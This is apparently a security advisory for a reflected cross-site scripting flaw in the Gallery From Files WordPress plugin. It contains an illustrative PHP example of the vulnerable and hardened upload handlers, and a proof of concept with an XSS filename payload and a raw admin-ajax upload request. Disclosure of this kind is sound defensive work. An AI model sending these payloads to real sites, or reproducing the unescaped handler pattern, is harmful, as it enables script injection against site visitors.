Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)

Description

The plugin allows images to be uploaded to the server, but filenames are not sanitized before being output in the error message shown when a file has an invalid extension, leading to a reflected Cross-Site Scripting issue. Because the upload handler performs no CSRF check, the attack can also be delivered via that vector.
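As an added illustration that is not the plugin's own source, the unescaped-output pattern the description refers to is shown next to a hardened handler; only the AJAX action name comes from the PoC request below, while the function names, nonce action and capability are assumptions.

```php
<?php
// Illustrative example, not code from the Gallery From Files plugin.
// Only the action name (gallery_from_files_595_fileupload) is taken from the
// advisory; handler names, the nonce action and the capability are assumed.

// Vulnerable pattern: the client-supplied filename is echoed verbatim into the
// error message, so a name such as <img src=x onerror=alert(1337)> is rendered
// as HTML, and without a nonce the request can be triggered cross-site.
function gff_upload_vulnerable() {
    $name = $_FILES['myfile']['name'][0];
    $ext  = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
    if ( ! in_array( $ext, array( 'jpg', 'jpeg', 'png', 'gif' ), true ) ) {
        echo 'Invalid file extension: ' . $name; // unescaped -> reflected XSS
        wp_die();
    }
    // ... move the file ...
}

// Hardened version: verify the AJAX nonce (CSRF), require a capability,
// validate the type with WordPress helpers, and escape the name on output.
function gff_upload_hardened() {
    check_ajax_referer( 'gff_upload', 'nonce' );     // dies on a missing/bad nonce
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( 'Insufficient permissions', 403 );
    }
    $raw  = isset( $_FILES['myfile']['name'][0] ) ? $_FILES['myfile']['name'][0] : '';
    $name = sanitize_file_name( $raw );              // strips markup and odd characters
    $type = wp_check_filetype( $name );              // extension + MIME allow-list
    if ( empty( $type['ext'] ) || 0 !== strpos( $type['type'], 'image/' ) ) {
        // esc_html() neutralises anything that survived sanitisation before it
        // reaches the page, whether echoed directly or inserted by client JS.
        wp_send_json_error( 'Invalid file extension: ' . esc_html( $name ) );
    }
    // ... store the file via wp_handle_upload() ...
    wp_send_json_success();
}

// Register only the authenticated hook; omitting the wp_ajax_nopriv_ variant
// removes the unauthenticated path noted in the PoC ("Cookies: any user or even
// unauthenticated").
add_action( 'wp_ajax_gallery_from_files_595_fileupload', 'gff_upload_hardened' );
```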

Proof of Concept

Steps:

1. Rename any file to <img src=x onerror=alert(1337)>
2. Choose this file for upload and click the "upload selected file" button.
3. While the file is uploading, an alert box containing "1337" pops up on screen.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 506
Cookies: [any user or even unauthenticated]
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>"
Content-Type: image/png


-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812--

Classification

Type: XSS
Miscellaneous

Original Researcher: Satyender Yadav
Submitter: Satyender Yadav
Verified: Yes

Timeline

Publicly Published: 2021-05-26
Added: 2021-05-26
Last Updated: 2021-05-26